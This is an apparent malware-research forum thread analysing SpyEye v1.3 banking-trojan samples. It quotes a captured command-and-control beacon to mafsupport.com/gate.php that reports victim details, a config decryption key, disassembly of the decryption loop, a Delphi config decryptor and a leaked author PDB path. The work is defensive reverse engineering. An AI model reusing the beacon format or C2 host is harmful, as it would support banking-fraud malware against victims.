 #5234  by EP_X0FF
 Tue Mar 01, 2011 3:55 am
markusg wrote:http://virusscan.jotti.org/de/scanresul ... 6bab0f122a
SpyEye v1.3
mafsupport.com GET /~brbrabr/gate.php?guid=5.1.2600!FUCKTHAT!D06F0742&ver=10310&ie=6.0.2900.2180&os=5.1.2600&ut=Admin&ccrc=6BBA1CA6&md5=c1d4ff03593201296531783c9b13936f&plg=customconnector&stat=online HTTP/1.1
 #5473  by Xylitol
 Tue Mar 15, 2011 1:53 pm
See archive comment for password
 #6055  by EP_X0FF
 Wed Apr 27, 2011 11:38 am
Personally I found this funny.
Omfg! Process is still active? Lets kill that mazafaka!
:)
 #6057  by EP_X0FF
 Wed Apr 27, 2011 12:10 pm
Find attached the decrypted config.bin (small decryptor coming soon)

pass: EA9D67D04EA91926C211C45DE8AF991E (from SpyEye itself)

edit:
type
  { Open-ended byte view over a raw buffer: the pointer type is declared
    first and resolved against the array type that follows. Indexing past
    element 0 is only valid with range checking disabled. }
  PBYTEBUF = ^BYTEBUF;
  BYTEBUF = array[0..0] of BYTE;
{

0091030E SpyEye_DecryptCycle:
0091030E     mov     dl, [eax+ecx]
00910311     xor     dl, 4Ch
00910314     sub     dl, [eax+ecx-1]
00910318     mov     [eax+ecx], dl
0091031B     dec     eax
0091031C     test    eax, eax
0091031E     jg      short SpyEye_DecryptCycle

}
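{
  SpyEyeDecodeConfig

  Decrypts the SpyEye config file named by lpConfigName and writes the
  result to 'decrypted.zip' in the current directory.

  The transform mirrors SpyEye_DecryptCycle above: walking from the last
  index down to 1, each byte is XORed with $4C and the still-encrypted
  preceding byte is subtracted from it. Byte 0 is left untouched. The
  descending order is what guarantees buf[i - 1] is read before it is
  itself rewritten.

  No output is produced if the input cannot be opened, its size cannot be
  determined, allocation fails, or the read returns fewer than fsize bytes.
  Handles are closed only when they were actually opened (the original
  called CloseHandle on INVALID_HANDLE_VALUE when CreateFileW failed).
}
procedure SpyEyeDecodeConfig(lpConfigName: PWideChar);
var
  hInput, hOutput: THANDLE;
  fsize, bytesIO: DWORD;
  i: integer;
  c: byte;
  buf: PBYTEBUF;
begin
  hInput := CreateFileW(lpConfigName, GENERIC_READ, 0, nil, OPEN_EXISTING, 0, 0);
  if (hInput = INVALID_HANDLE_VALUE) then
    Exit;

  fsize := GetFileSize(hInput, nil);
  // On failure GetFileSize returns INVALID_FILE_SIZE, and fsize + 1 below
  // would wrap to a zero-length allocation.
  if (fsize <> INVALID_FILE_SIZE) then
  begin
    // LPTR zero-fills. The extra byte is needed: the first loop iteration
    // reads and rewrites buf[fsize], one past the file data. Its result is
    // never written out (only fsize bytes are), but it must be readable.
    buf := pointer(LocalAlloc(LPTR, fsize + 1));
    if (buf <> nil) then
    begin
      bytesIO := 0;
      _ReadFile(hInput, buf, fsize, @bytesIO, nil);
      // Decrypt only a complete read; a short read would otherwise be
      // silently emitted as a truncated, garbled archive.
      if (bytesIO = fsize) then
      begin
        for i := fsize downto 1 do
        begin
          c := buf[i] xor $4C;
          c := c - buf[i - 1];
          buf[i] := c;
        end;
        hOutput := CreateFileW('decrypted.zip', GENERIC_WRITE, 0, nil, CREATE_ALWAYS, 0, 0);
        if (hOutput <> INVALID_HANDLE_VALUE) then
        begin
          _WriteFile(hOutput, buf, fsize, @bytesIO, nil);
          CloseHandle(hOutput);
        end;
      end;
      LocalFree(HLOCAL(buf));
    end;
  end;
  CloseHandle(hInput);
end;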
lol
C:\Data\Documents\My Projects\CC\CardNet\Progs\Client\SpyEye\plugins\BC\Client\Release\socks5.pdb